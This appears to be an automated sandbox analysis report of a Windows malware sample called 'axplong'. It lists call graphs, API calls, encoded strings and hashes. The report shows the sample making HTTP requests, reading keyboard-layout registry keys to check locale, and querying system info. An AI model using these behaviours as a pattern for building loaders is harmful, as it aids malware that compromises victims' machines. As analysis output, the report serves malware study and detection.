6d2d48 13463->13465 13469 6ebe27 13463->13469 13464->13453 13476 6d2400 13465->13476 13470 6ebe33 std::_Xinvalid_argument 13469->13470 13471 6ebe9a 13470->13471 13472 6ebea3 13470->13472 13479 6ebdaf 13471->13479 13473 6d2aa0 10 API calls 13472->13473 13475 6ebe9f 13473->13475 13475->13465 13497 6eb506 13476->13497 13478 6d2432 13480 6ecb61 InitOnceExecuteOnce 13479->13480 13481 6ebdc7 13480->13481 13482 6ebdce 13481->13482 13485 706beb 13481->13485 13482->13475 13484 6ebdd7 13484->13475 13490 706bf7 13485->13490 13486 708aaf __fassign 4 API calls 13487 706c26 13486->13487 13488 706c43 13487->13488 13489 706c35 13487->13489 13492 7068bd 4 API calls 13488->13492 13491 706c99 9 API calls 13489->13491 13490->13486 13493 706c3f 13491->13493 13494 706c5d 13492->13494 13493->13484 13495 706c99 9 API calls 13494->13495 13496 706c71 ___free_lconv_mon 13494->13496 13495->13496 13496->13484 13499 6eb521 std::_Xinvalid_argument 13497->13499 13498 6eb588 __fassign 13498->13478 13499->13498 13500 708aaf __fassign 4 API calls 13499->13500 13501 6eb5cf 13500->13501 13021 6eb85e 13026 6eb6e5 13021->13026 13023 6eb886 13034 6eb648 13023->13034 13025 6eb89f 13027 6eb6f1 Concurrency::details::_Reschedule_chore 13026->13027 13028 6eb722 13027->13028 13044 6ec5dc 13027->13044 13028->13023 13032 6eb70c __Mtx_unlock 13033 6d2ad0 10 API calls 13032->13033 13033->13028 13035 6eb654 Concurrency::details::_Reschedule_chore 13034->13035 13036 6ec5dc GetSystemTimePreciseAsFileTime 13035->13036 13037 6eb6ae 13035->13037 13038 6eb669 13036->13038 13037->13025 13039 6d2ad0 10 API calls 13038->13039 13040 6eb66f __Mtx_unlock 13039->13040 13041 6d2ad0 10 API calls 13040->13041 13042 6eb68c __Cnd_broadcast 13041->13042 13042->13037 13043 6d2ad0 10 API calls 13042->13043 13043->13037 13052 6ec382 13044->13052 13046 6eb706 13047 6d2ad0 13046->13047 13048 6d2adc 13047->13048 13049 6d2ada 13047->13049 13069 6ec19a 13048->13069 13049->13032 13053 6ec3d8 13052->13053 13055 6ec3aa 13052->13055 13053->13055 13058 6ece9b 13053->13058 13055->13046 13056 6ec42d __Xtime_diff_to_millis2 13056->13055 13057 6ece9b _xtime_get GetSystemTimePreciseAsFileTime 13056->13057 13057->13056 13059 6eceaa 13058->13059 13061 6eceb7 __aulldvrm 13058->13061 13059->13061 13062 6ece74 13059->13062 13061->13056 13065 6ecb1a 13062->13065 13066 6ecb2b GetSystemTimePreciseAsFileTime 13065->13066 13067 6ecb37 13065->13067 13066->13067 13067->13061 13070 6ec1a4 13069->13070 13071 6ec1c2 13069->13071 13070->13071 13073 6ec1c7 13070->13073 13071->13071 13076 6d2aa0 13073->13076 13075 6ec1de std::_Xinvalid_argument 13075->13070 13090 6ebe0f 13076->13090 13078 6d2abf 13078->13075 13079 6d2ab4 13079->13078 13080 708aaf __fassign 4 API calls 13079->13080 13081 706c26 13080->13081 13082 706c43 13081->13082 13083 706c35 13081->13083 13085 7068bd 4 API calls 13082->13085 13084 706c99 9 API calls 13083->13084 13086 706c3f 13084->13086 13087 706c5d 13085->13087 13086->13075 13088 706c99 9 API calls 13087->13088 13089 706c71 ___free_lconv_mon 13087->13089 13088->13089 13089->13075 13093 6ecb61 13090->13093 13094 6ecb6f InitOnceExecuteOnce 13093->13094 13096 6ebe22 13093->13096 13094->13096 13096->13079 12844 706beb 12849 706bf7 12844->12849 12846 706c26 12847 706c43 12846->12847 12848 706c35 12846->12848 12864 7068bd 12847->12864 12850 706c99 9 API calls 12848->12850 12856 708aaf 12849->12856 12852 706c3f 12850->12852 12853 706c5d 12855 706c71 ___free_lconv_mon 12853->12855 12867 706c99 12853->12867 12857 708ab4 __fassign 12856->12857 12860 708abf 12857->12860 12879 70d4f4 12857->12879 12876 70651d 12860->12876 12861 70d727 RtlAllocateHeap 12862 70d73a __dosmaperr 12861->12862 12863 708af2 __fassign 12861->12863 12862->12846 12863->12861 12863->12862 12898 70683a 12864->12898 12866 7068cf 12866->12853 12868 706cc4 __cftof 12867->12868 12874 706ca7 __cftof __dosmaperr 12867->12874 12869 706d06 CreateFileW 12868->12869 12875 706cea __cftof __dosmaperr 12868->12875 12870 706d38 12869->12870 12871 706d2a 12869->12871 12948 706d77 12870->12948 12934 706e01 GetFileType 12871->12934 12874->12855 12875->12855 12886 7063f7 12876->12886 12880 70d500 __fassign 12879->12880 12881 70651d __fassign 2 API calls 12880->12881 12882 70d55c __cftof __dosmaperr __fassign 12880->12882 12885 70d6ee __fassign 12881->12885 12882->12860 12883 70d727 RtlAllocateHeap 12884 70d73a __dosmaperr 12883->12884 12883->12885 12884->12860 12885->12883 12885->12884 12888 706405 __fassign 12886->12888 12887 706450 12887->12863 12888->12887 12891 70645b 12888->12891 12896 70a1c2 GetPEB 12891->12896 12893 706465 12894 70646a GetPEB 12893->12894 12895 70647a __fassign 12893->12895 12894->12895 12897 70a1dc __fassign 12896->12897 12897->12893 12899 706851 12898->12899 12900 70685a 12898->12900 12899->12866 12900->12899 12904 70b4bb 12900->12904 12905 706890 12904->12905 12906 70b4ce 12904->12906 12908 70b4e8 12905->12908 12906->12905 12912 70f46b 12906->12912 12909 70b510 12908->12909 12910 70b4fb 12908->12910 12909->12899 12910->12909 12917 70e571 12910->12917 12914 70f477 __fassign 12912->12914 12913 70f4c6 12913->12905 12914->12913 12915 708aaf __fassign 4 API calls 12914->12915 12916 70f4eb 12915->12916 12918 70e57b 12917->12918 12921 70e489 12918->12921 12920 70e581 12920->12909 12925 70e495 __fassign ___free_lconv_mon 12921->12925 12922 70e4b6 12922->12920 12923 708aaf __fassign 4 API calls 12924 70e528 12923->12924 12926 70e564 12924->12926 12930 70a5ee 12924->12930 12925->12922 12925->12923 12926->12920 12931 70a611 12930->12931 12932 708aaf __fassign 4 API calls 12931->12932 12933 70a687 12932->12933 12935 706e3c 12934->12935 12939 706ed2 __dosmaperr 12934->12939 12936 706e56 __cftof 12935->12936 12970 707177 12935->12970 12938 706e75 GetFileInformationByHandle 12936->12938 12936->12939 12938->12939 12940 706e8b 12938->12940 12939->12875 12956 7070c9 12940->12956 12944 706ea8 12945 706f71 SystemTimeToTzSpecificLocalTime 12944->12945 12946 706ebb 12945->12946 12947 706f71 SystemTimeToTzSpecificLocalTime 12946->12947 12947->12939 12993 707314 12948->12993 12950 706d85 12951 706d8a __dosmaperr 12950->12951 12952 7070c9 4 API calls 12950->12952 12951->12875 12953 706da3 12952->12953 12954 707177 RtlAllocateHeap 12953->12954 12955 706dc2 12954->12955 12955->12875 12958 7070df _wcsrchr 12956->12958 12957 706e97 12966 706f71 12957->12966 12958->12957 12974 70b9e4 12958->12974 12960 707123 12960->12957 12961 70b9e4 4 API calls 12960->12961 12962 707134 12961->12962 12962->12957 12963 70b9e4 4 API calls 12962->12963 12964 707145 12963->12964 12964->12957 12965 70b9e4 4 API calls 12964->12965 12965->12957 12967 706f89 12966->12967 12968 706fa9 SystemTimeToTzSpecificLocalTime 12967->12968 12969 706f8f 12967->12969 12968->12969 12969->12944 12971 707190 12970->12971 12973 7071a4 __dosmaperr 12971->12973 12985 70b568 12971->12985 12973->12936 12975 70b9f2 12974->12975 12978 70b9f8 __cftof __dosmaperr 12975->12978 12979 70ba2d 12975->12979 12977 70ba28 12977->12960 12978->12960 12980 70ba57 12979->12980 12982 70ba3d __cftof __dosmaperr 12979->12982 12981 70683a __fassign 4 API calls 12980->12981 12980->12982 12984 70ba81 12981->12984 12982->12977 12983 70b9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12983->12984 12984->12982 12984->12983 12986 70b592 __cftof 12985->12986 12988 70b5ae __dosmaperr ___free_lconv_mon 12986->12988 12989 70d6ef 12986->12989 12988->12973 12992 70d6fc __fassign 12989->12992 12990 70d727 RtlAllocateHeap 12991 70d73a __dosmaperr 12990->12991 12990->12992 12991->12988 12992->12990 12992->12991 12994 707338 12993->12994 12996 70733e 12994->12996 12997 707036 12994->12997 12996->12950 12998 707042 __dosmaperr 12997->12998 13003 70b87b 12998->13003 13000 707068 13000->12996 13001 70705a __dosmaperr 13001->13000 13002 70b87b RtlAllocateHeap 13001->13002 13002->13000 13006 70b6de 13003->13006 13005 70b894 13005->13001 13007 70b6ee 13006->13007 13009 70b6f5 13007->13009 13010 711ef8 13007->13010 13009->13005 13013 711d22 13010->13013 13012 711f0f 13012->13009 13014 711d54 13013->13014 13016 711d40 __cftof __dosmaperr 13013->13016 13015 70b568 RtlAllocateHeap 13014->13015 13014->13016 13015->13016 13016->13012 13115 6de410 13116 6de435 13115->13116 13118 6de419 13115->13118 13118->13116 13119 6de270 13118->13119 13120 6de280 __dosmaperr 13119->13120 13125 708979 13120->13125 13122 6de435 13122->13118 13123 6de270 4 API calls 13124 6de2bd std::_Xinvalid_argument 13123->13124 13124->13122 13124->13123 13126 708994 13125->13126 13129 7086d7 13126->13129 13128 70899e 13128->13124 13130 7086e9 13129->13130 13131 70683a __fassign 4 API calls 13130->13131 13134 7086fe __cftof __dosmaperr 13130->13134 13133 70872e 13131->13133 13133->13134 13135 708925 13133->13135 13134->13128 13136 708962 13135->13136 13137 708932 13135->13137 13146 70d2e9 13136->13146 13139 708941 __fassign 13137->13139 13141 70d30d 13137->13141 13139->13133 13142 70683a __fassign 4 API calls 13141->13142 13143 70d32a 13142->13143 13145 70d33a 13143->13145 13150 70f07f 13143->13150 13145->13139 13147 70d2f4 13146->13147 13148 70b4bb __fassign 4 API calls 13147->13148 13149 70d304 13148->13149 13149->13139 13151 70683a __fassign 4 API calls 13150->13151 13152 70f09f __cftof __fassign __freea 13151->13152 13152->13145 13292 6d86b0 13293 6d86b6 13292->13293 13299 706659 13293->13299 13296 6d86d6 13298 6d86d0 13306 7065a2 13299->13306 13301 6d86c3 13301->13296 13302 7066e7 13301->13302 13303 7066f3 13302->13303 13305 7066fd __cftof __dosmaperr 13303->13305 13318 706670 13303->13318 13305->13298 13307 7065ae 13306->13307 13309 7065b5 __cftof __dosmaperr 13307->13309 13310 70a783 13307->13310 13309->13301 13311 70a78f 13310->13311 13314 70a827 13311->13314 13313 70a7aa 13313->13309 13316 70a84a 13314->13316 13315 70d6ef RtlAllocateHeap 13317 70a890 ___free_lconv_mon 13315->13317 13316->13315 13316->13316 13316->13317 13317->13313 13319 706692 13318->13319 13320 70667d __cftof __dosmaperr ___free_lconv_mon 13318->13320 13319->13320 13322 709ef9 13319->13322 13320->13305 13323 709f36 13322->13323 13324 709f11 13322->13324 13323->13320 13324->13323 13326 7102f8 13324->13326 13327 710304 13326->13327 13329 71030c __cftof __dosmaperr 13327->13329 13330 7103ea 13327->13330 13329->13323 13331 710410 __cftof __dosmaperr 13330->13331 13332 71040c 13330->13332 13331->13329 13332->13331 13334 70fb7f 13332->13334 13335 70fbcc 13334->13335 13336 70683a __fassign 4 API calls 13335->13336 13340 70fbdb __cftof 13336->13340 13337 70fe7b 13337->13331 13338 70d2e9 4 API calls 13338->13340 13339 70c4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 13339->13340 13340->13337 13340->13338 13340->13339 13519 6ddfd0 recv 13520 6de032 recv 13519->13520 13521 6de067 recv 13520->13521 13522 6de0a1 13521->13522 13523 6de1c3 13522->13523 13524 6ec5dc GetSystemTimePreciseAsFileTime 13522->13524 13525 6de1fe 13524->13525 13526 6ec19a 10 API calls 13525->13526 13527 6de268 13526->13527 13502 6e9310 13503 6e9363 13502->13503 13504 6e9325 13502->13504 13505 6ed041 SleepConditionVariableCS 13504->13505 13506 6e932f 13505->13506 13506->13503 13507 6ecff7 RtlWakeAllConditionVariable 13506->13507 13507->13503 13017 70d6ef 13020 70d6fc __fassign 13017->13020 13018 70d727 RtlAllocateHeap 13019 70d73a __dosmaperr 13018->13019 13018->13020 13020->13018 13020->13019

                      Executed Functions

                      Function 006DBD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 760 6dbd60-6dbdac 761 6dc1a1-6dc1c6 call 6e7f30 760->761 762 6dbdb2-6dbdb6 760->762 767 6dc1c8-6dc1d4 761->767 768 6dc1f4-6dc20c 761->768 762->761 764 6dbdbc-6dbdc0 762->764 764->761 766 6dbdc6-6dbe4f InternetOpenW InternetConnectA call 6e7870 call 6d5b20 764->766 790 6dbe51 766->790 791 6dbe53-6dbe6f HttpOpenRequestA 766->791 770 6dc1ea-6dc1f1 call 6ed593 767->770 771 6dc1d6-6dc1e4 767->771 772 6dc158-6dc170 768->772 773 6dc212-6dc21e 768->773 770->768 771->770 775 6dc26f-6dc274 call 706b9a 771->775 779 6dc176-6dc182 772->779 780 6dc243-6dc25f call 6ecf21 772->780 777 6dc14e-6dc155 call 6ed593 773->777 778 6dc224-6dc232 773->778 777->772 778->775 786 6dc234 778->786 787 6dc239-6dc240 call 6ed593 779->787 788 6dc188-6dc196 779->788 786->777 787->780 788->775 796 6dc19c 788->796 790->791 797 6dbe71-6dbe80 791->797 798 6dbea0-6dbf0f call 6e7870 call 6d5b20 call 6e7870 call 6d5b20 791->798 796->787 800 6dbe96-6dbe9d call 6ed593 797->800 801 6dbe82-6dbe90 797->801 812 6dbf11 798->812 813 6dbf13-6dbf29 HttpSendRequestA 798->813 800->798 801->800 812->813 814 6dbf2b-6dbf3a 813->814 815 6dbf5a-6dbf82 813->815 816 6dbf3c-6dbf4a 814->816 817 6dbf50-6dbf57 call 6ed593 814->817 818 6dbf84-6dbf93 815->818 819 6dbfb3-6dbfd4 InternetReadFile 815->819 816->817 817->815 821 6dbfa9-6dbfb0 call 6ed593 818->821 822 6dbf95-6dbfa3 818->822 823 6dbfda 819->823 821->819 822->821 826 6dbfe0-6dc090 call 704180 823->826
                      APIs
                      • InternetOpenW.WININET(00728D70,00000000,00000000,00000000,00000000), ref: 006DBDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 006DBE11
                      • HttpOpenRequestA.WININET(?,00000000), ref: 006DBE5A
                      • HttpSendRequestA.WININET(?,00000000), ref: 006DBF1B
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 006DBFCD
                      • InternetCloseHandle.WININET(?), ref: 006DC0A7
                      • InternetCloseHandle.WININET(?), ref: 006DC0AF
                      • InternetCloseHandle.WININET(?), ref: 006DC0B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4s$invalid stoi argument$stoi argument out of range
                      • API String ID: 688256393-2692989305
                      • Opcode ID: ac77c685c46c48d799d864955b84e675a6c0625a90255bc2e0e438bd1b8dd3f3
                      • Instruction ID: 7f3929dc945428a51cd490ee2ad16be5f6797a8b69f5b1322111f98462c7c813
                      • Opcode Fuzzy Hash: ac77c685c46c48d799d864955b84e675a6c0625a90255bc2e0e438bd1b8dd3f3
                      • Instruction Fuzzy Hash: 4BB1D4B1A001189BEB24CF28CC84BEEBB66EF45314F5041AEF509973C2D7759AC4CB99
                      Function 04FD0D0E Relevance: .1, Instructions: 65COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0a24811da9a232f0132e0057b85ef1d632f823cc60e6ab2410c965cd05ffae43
                      • Instruction ID: d81b7edf1925f255dcff6d626e9b33cc92fc9c2e53c72e8ec8e22489911ae981
                      • Opcode Fuzzy Hash: 0a24811da9a232f0132e0057b85ef1d632f823cc60e6ab2410c965cd05ffae43
                      • Instruction Fuzzy Hash: 9B01D6E734C151AEE142918167445B6BB6BF7DA334B384027F407D5502FE8839976121
                      Function 006E46C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
                      • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-s
                      • API String ID: 3545240790-3040698226
                      • Opcode ID: d033267bbfef318269039ca9783c000998b11d6132eeac719f782f3ff53aa4d9
                      • Instruction ID: 7e9c7186cb06eb81a548951b1ba02d1584b87b2a93c7a6a41e0aa4fe107ef8dd
                      • Opcode Fuzzy Hash: d033267bbfef318269039ca9783c000998b11d6132eeac719f782f3ff53aa4d9
                      • Instruction Fuzzy Hash: 74231371E012988BEB19DB28CD8979DBB779B91304F5081DCE009AB2C6EB359F84CF55
                      Function 006D5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 915 6d5df0-6d5eee 921 6d5f18-6d5f25 call 6ecf21 915->921 922 6d5ef0-6d5efc 915->922 924 6d5f0e-6d5f15 call 6ed593 922->924 925 6d5efe-6d5f0c 922->925 924->921 925->924 926 6d5f26-6d60ad call 706b9a call 6ee080 call 6e7f30 * 5 RegOpenKeyExA 925->926 944 6d6478-6d6481 926->944 945 6d60b3-6d6143 call 704020 926->945 947 6d64ae-6d64b7 944->947 948 6d6483-6d648e 944->948 974 6d6149-6d614d 945->974 975 6d6466-6d6472 945->975 951 6d64b9-6d64c4 947->951 952 6d64e4-6d64ed 947->952 949 6d64a4-6d64ab call 6ed593 948->949 950 6d6490-6d649e 948->950 949->947 950->949 954 6d659e-6d65a3 call 706b9a 950->954 956 6d64da-6d64e1 call 6ed593 951->956 957 6d64c6-6d64d4 951->957 958 6d64ef-6d64fa 952->958 959 6d651a-6d6523 952->959 956->952 957->954 957->956 966 6d64fc-6d650a 958->966 967 6d6510-6d6517 call 6ed593 958->967 961 6d654c-6d6555 959->961 962 6d6525-6d6530 959->962 971 6d6557-6d6566 961->971 972 6d6582-6d659d call 6ecf21 961->972 969 6d6542-6d6549 call 6ed593 962->969 970 6d6532-6d6540 962->970 966->954 966->967 967->959 969->961 970->954 970->969 978 6d6578-6d657f call 6ed593 971->978 979 6d6568-6d6576 971->979 980 6d6460 974->980 981 6d6153-6d6187 RegEnumValueW 974->981 975->944 978->972 979->954 979->978 980->975 986 6d644d-6d6454 981->986 987 6d618d-6d61ad 981->987 986->981 990 6d645a 986->990 992 6d61b0-6d61b9 987->992 990->980 992->992 993 6d61bb-6d624d call 6e7c50 call 6e8090 call 6e7870 * 2 call 6d5c60 992->993 993->986
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: 5a31cc14602700692b8f88206a044cea384f91fd1656f7524cec19f5c5b0207d
                      • Instruction ID: 3606d048c4030467619f04189423538927ae50767b6c26e02c712b332a320904
                      • Opcode Fuzzy Hash: 5a31cc14602700692b8f88206a044cea384f91fd1656f7524cec19f5c5b0207d
                      • Instruction Fuzzy Hash: 9EE18071901258AFEB24DF94CC89BDEB7BAAF04304F5042DAE509A7291DB74ABC4CF51
                      Function 006D7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1003 6d7d00-6d7d82 call 704020 1007 6d827e-6d829b call 6ecf21 1003->1007 1008 6d7d88-6d7db0 call 6e7870 call 6d5b20 1003->1008 1015 6d7db4-6d7dd6 call 6e7870 call 6d5b20 1008->1015 1016 6d7db2 1008->1016 1021 6d7dd8 1015->1021 1022 6d7dda-6d7df3 1015->1022 1016->1015 1021->1022 1025 6d7df5-6d7e04 1022->1025 1026 6d7e24-6d7e4f 1022->1026 1027 6d7e1a-6d7e21 call 6ed593 1025->1027 1028 6d7e06-6d7e14 1025->1028 1029 6d7e51-6d7e60 1026->1029 1030 6d7e80-6d7ea1 1026->1030 1027->1026 1028->1027 1033 6d829c call 706b9a 1028->1033 1035 6d7e76-6d7e7d call 6ed593 1029->1035 1036 6d7e62-6d7e70 1029->1036 1031 6d7ea7-6d7eac 1030->1031 1032 6d7ea3-6d7ea5 GetNativeSystemInfo 1030->1032 1037 6d7ead-6d7eb6 1031->1037 1032->1037 1044 6d82a1-6d82a6 call 706b9a 1033->1044 1035->1030 1036->1033 1036->1035 1042 6d7eb8-6d7ebf 1037->1042 1043 6d7ed4-6d7ed7 1037->1043 1046 6d8279 1042->1046 1047 6d7ec5-6d7ecf 1042->1047 1048 6d7edd-6d7ee6 1043->1048 1049 6d821f-6d8222 1043->1049 1046->1007 1051 6d8274 1047->1051 1052 6d7ef9-6d7efc 1048->1052 1053 6d7ee8-6d7ef4 1048->1053 1049->1046 1054 6d8224-6d822d 1049->1054 1051->1046 1056 6d81fc-6d81fe 1052->1056 1057 6d7f02-6d7f09 1052->1057 1053->1051 1058 6d822f-6d8233 1054->1058 1059 6d8254-6d8257 1054->1059 1062 6d820c-6d820f 1056->1062 1063 6d8200-6d820a 1056->1063 1064 6d7f0f-6d7f6b call 6e7870 call 6d5b20 call 6e7870 call 6d5b20 call 6d5c60 1057->1064 1065 6d7fe9-6d81e5 call 6e7870 call 6d5b20 call 6e7870 call 6d5b20 call 6d5c60 call 6e7870 call 6d5b20 call 6d5640 call 6e7870 call 6d5b20 call 6e7870 call 6d5b20 call 6d5c60 call 6e7870 call 6d5b20 call 6d5640 call 6e7870 call 6d5b20 call 6e7870 call 6d5b20 call 6d5c60 call 6e7870 call 6d5b20 call 6d5640 1057->1065 1066 6d8248-6d8252 1058->1066 1067 6d8235-6d823a 1058->1067 1060 6d8259-6d8263 1059->1060 1061 6d8265-6d8271 1059->1061 1060->1046 1061->1051 1062->1046 1069 6d8211-6d821d 1062->1069 1063->1051 1088 6d7f70-6d7f77 1064->1088 1101 6d81eb-6d81f4 1065->1101 1066->1046 1067->1066 1071 6d823c-6d8246 1067->1071 1069->1051 1071->1046 1090 6d7f79 1088->1090 1091 6d7f7b-6d7f9b call 708a81 1088->1091 1090->1091 1098 6d7f9d-6d7fac 1091->1098 1099 6d7fd2-6d7fd4 1091->1099 1103 6d7fae-6d7fbc 1098->1103 1104 6d7fc2-6d7fcf call 6ed593 1098->1104 1099->1101 1102 6d7fda-6d7fe4 1099->1102 1101->1049 1106 6d81f6 1101->1106 1102->1101 1103->1044 1103->1104 1104->1099 1106->1056
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D7EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                      • API String ID: 1721193555-2057465332
                      • Opcode ID: 296f4acec07ea619c068d9f1a998e7dc840602963a97157e7f63ebaf5746bb49
                      • Instruction ID: d76f7942652aab05bd90314302245cea05a9c7d0550563f5f8e92550c6fa2b7a
                      • Opcode Fuzzy Hash: 296f4acec07ea619c068d9f1a998e7dc840602963a97157e7f63ebaf5746bb49
